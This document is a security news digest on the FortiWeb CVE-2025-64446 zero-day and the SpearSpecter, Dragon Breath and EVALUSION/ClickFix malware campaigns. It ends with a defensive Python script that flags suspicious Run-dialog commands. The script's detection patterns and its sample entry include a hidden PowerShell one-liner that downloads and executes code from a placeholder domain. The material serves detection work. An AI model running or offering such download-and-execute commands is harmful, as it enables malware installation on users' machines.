FortiWeb Zero-Day (CVE-2025-64446) Actively Exploited to Create Admin Accounts and Execute Commands
Fortinet has confirmed that a critical FortiWeb zero-day vulnerability (CVE-2025-64446) was silently patched after widespread in-the-wild exploitation began in early October. The flaw, a relative path-traversal weakness in the FortiWeb GUI component, allows unauthenticated attackers to send crafted HTTP or HTTPS requests that bypass authentication and execute administrative operations on exposed devices. Multiple security researchers have validated the exploit, noting that earlier firmware builds remain vulnerable while updated versions no longer accept the attack chain. CISA has since added the vulnerability to its Known Exploited Vulnerabilities catalog and issued an emergency directive requiring federal agencies to patch by November 21. Researchers report that exploitation has targeted organizations across multiple industries, underscoring how security appliances remain high-value footholds for both cybercriminal and APT activity. Fortinet has released fixed firmware across all major branches, with the fully patched version being FortiWeb 8.0.2 and corresponding updates in the 7.6, 7.4, 7.2, and 7.0 series. Organizations unable to patch immediately are urged to disable HTTP/HTTPS access for all internet-exposed management interfaces, restrict administrative access to trusted networks, and monitor for unauthorized user creation or unexpected configuration changes. CISA further recommends isolating affected appliances, reviewing logs for anomalous traffic patterns, and enforcing strict segmentation for any security infrastructure reachable from external networks. The incident underscores a recurring trend: attackers are increasingly targeting edge devices and network security appliances, turning defensive technologies into entry points for deeper intrusions and lateral movement when they are not promptly updated.
Iranian SpearSpecter Campaign Targets High-Value Officials With Personalized Social Engineering and Advanced In-Memory Backdoors
Researchers have uncovered a long-running SpearSpecter espionage campaign targeting senior government, defense, and diplomatic officials across multiple regions using highly personalized social-engineering lures. Operated by Iran’s IRGC-IO–aligned threat cluster (APT42 / Mint Sandstorm / Educated Manticore / CharmingCypress), the group engages victims through multi-week rapport-building on WhatsApp before delivering tailored meeting invitations or conference documents. These lures redirect to attacker-controlled WebDAV shares, where malicious LNK files masquerade as PDFs and trigger hidden command execution. The infection chain ultimately deploys TAMECAT, an in-memory PowerShell backdoor with AES-encrypted multi-channel C2 over web traffic, Telegram, and Discord. Once active, the malware retrieves browser credentials, captures frequent screenshots, and exfiltrates staged data in encrypted chunks to evade inspection. The campaign’s sophistication lies in its blending of human-driven social trust with stealthy technical execution, enabling prolonged access to sensitive accounts and devices belonging to both officials and their family members. TAMECAT’s use of remote debugging, process suspension, and multi-stage loaders enables it to harvest high-value intelligence while bypassing endpoint controls. Persistence is achieved via registry-based login scripts, and infrastructure relies on Cloudflare Workers to obscure operator locations and maintain C2 resilience. The operation shows no signs of slowdown, demonstrating Iran’s continued prioritization of credential theft and long-term surveillance of high-value geopolitical targets. Defenders should restrict search-ms/WebDAV invocation, monitor for suspicious LNK execution paths, and deploy behavioral controls capable of identifying in-memory PowerShell backdoors and unauthorized remote debugging activity.
Dragon Breath Deploys RONINGLOADER to Disable Security Tools and Install Modified Gh0st RAT
Dragon Breath (APT-Q-27), a China-nexus threat actor linked to the broader Miuuti Group, is conducting a targeted campaign using a multi-stage loader known as RONINGLOADER to deliver a customized variant of Gh0st RAT. The operation relies on trojanized NSIS installers impersonating trusted applications, including Chrome and Teams, embedding redundant installer layers to hide malicious activity while installing benign decoys in parallel. Once activated, RONINGLOADER extracts encrypted shellcode from disguised image files, loads a clean system DLL to avoid existing userland hooks, and elevates privileges before scanning for and disabling Chinese-market security products, including Microsoft Defender, Kingsoft, Tencent PC Manager, and Qihoo 360. The loader employs multiple evasion techniques to terminate protected processes, tamper with Defender binaries, and neutralize host defenses. Its execution flow culminates in injecting a malicious DLL into regsvr32[.]exe, then launching Gh0st RAT inside high-privilege system processes to ensure stealth and persistence. The deployed Gh0st RAT variant supports a full suite of post-compromise capabilities, including registry modification, event log clearing, file exfiltration, command execution, clipboard and keystroke capture, and payload delivery via memory injection. In parallel, separate large-scale brand impersonation campaigns tracked as Campaign Trio and Campaign Chorus are delivering Gh0st RAT to Chinese-speaking users through trojanized installers for popular regional applications, with the latter campaign showing substantial sophistication through complex infection chains and redirection infrastructure. Researchers assess that Dragon Breath’s tooling reflects an ongoing shift toward layered loaders, signed-driver abuse, and aggressive EDR bypass to maintain access even in heavily instrumented environments. Organizations operating in East Asian markets should closely review execution of NSIS installers, monitor for unauthorized WDAC policy modifications and unusual driver loads, and enforce strict application-control policies to mitigate this evolving threat.
EVALUSION Campaign Uses ClickFix to Deliver Amatera Stealer and NetSupport RAT
Security analysts have identified a new EVALUSION malware campaign leveraging the ClickFix technique, in which victims are socially engineered to execute attacker-supplied commands via the Windows Run dialog. Once triggered, the chain downloads and launches Amatera Stealer (a rebranded and upgraded version of ACR Stealer) via obfuscated PowerShell loaders that employ XOR-based AMSI evasion and deliberately confusing code structures to bypass security tools. The infection begins with a .NET downloader protected with Agile.NET packing, which fetches RC2-encrypted payloads from public file-hosting services before deploying a Pure Crypter–packed binary that disables AMSI in memory. Amatera’s capabilities include credential theft from browsers and password managers, exfiltration of cryptocurrency wallet data, and covert communications encrypted with AES-256-CBC, using WoW64 syscall techniques to evade inspection. Shortly after initial theft, attackers deploy NetSupport RAT to establish persistent remote access and full interactive control of compromised systems. The campaign blends carefully crafted social-engineering lures with multi-stage loaders and layered evasion mechanisms, allowing even well-protected endpoints to be compromised. Amatera’s use of syscall-level execution, encrypted C2, and dynamic payload loading enables attackers to selectively target high-value systems while avoiding detection on low-value hosts. The combination of data-stealing malware and remote-access tooling illustrates an increasingly common trend in modern attack chains, where interactive footholds for lateral movement or ransomware deployment quickly follow initial theft operations. Defenders should monitor for suspicious Run-dialog activity, block untrusted PowerShell execution, and deploy behavioral detection that can identify AMSI tampering, loader chains, and NetSupport RAT artifacts. This campaign highlights the need for layered security controls that can detect script-based loaders, fileless execution, and post-exploitation frameworks used in blended intrusions.
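One concrete way to act on the "monitor for suspicious Run-dialog activity" recommendation above is to triage the Explorer RunMRU history, where commands pasted into the Run dialog are recorded. The script below is an added example, not code from the original item or from the researchers who reported the campaign; the RunMRU layout it models is the standard one, while the pattern list and the sample entries (including the placeholder domain) are constructed for illustration.

```python
r"""Flag ClickFix-style Run-dialog activity from Windows RunMRU entries.
Added example, not code from the original item. Input models the values under
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU as exported by
`reg query`: single-letter value names, data ending in Explorer's "\1" marker,
and MRUList ordering the letters newest-first."""
import re

# Illustrative patterns for pasted ClickFix one-liners (hidden/encoded PowerShell,
# download cmdlets, LOLBins fetching URLs); an assumption, not a vendor signature.
SUSPICIOUS = [re.compile(p, re.IGNORECASE) for p in (
    r"powershell.*(-w(indowstyle)?\s+hidden|-enc|-e\s|-ep\s+bypass|-nop)",
    r"\b(iwr|invoke-webrequest|irm|invoke-restmethod|certutil|curl)\b",
    r"\b(iex|invoke-expression)\b",
    r"\b(mshta|rundll32|cmd(\.exe)?\s+/c)\b.*https?://",
)]

def parse_runmru(values: dict[str, str]) -> list[str]:
    """Return Run history newest-first with the trailing "\\1" stripped;
    letters missing from MRUList (stale or tampered list) are still included."""
    order = values.get("MRUList", "")
    letters = list(order) + sorted(k for k in values if len(k) == 1 and k not in order)
    history = []
    for letter in letters:
        raw = values.get(letter)
        if raw is not None:
            history.append(raw[:-2] if raw.endswith("\\1") else raw)
    return history

def flag_clickfix(values: dict[str, str]) -> list[tuple[str, str]]:
    """Return (command, matched_pattern) for each Run entry hitting a pattern."""
    hits = []
    for cmd in parse_runmru(values):
        for pat in SUSPICIOUS:
            if pat.search(cmd):
                hits.append((cmd, pat.pattern))
                break
    return hits

# Constructed sample: two benign entries and one pasted ClickFix-style loader
# that points at a placeholder domain.
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": 'powershell -w hidden -ep bypass -c "iex (iwr https://example.invalid/v.txt)"\\1',
}

if __name__ == "__main__":
    for cmd, _ in flag_clickfix(SAMPLE_RUNMRU):
        print("SUSPICIOUS Run entry:", cmd)
```

In practice the dict would be populated from a registry export collected per user profile, and a hit should be correlated with process-creation telemetry showing explorer.exe spawning PowerShell or another flagged binary.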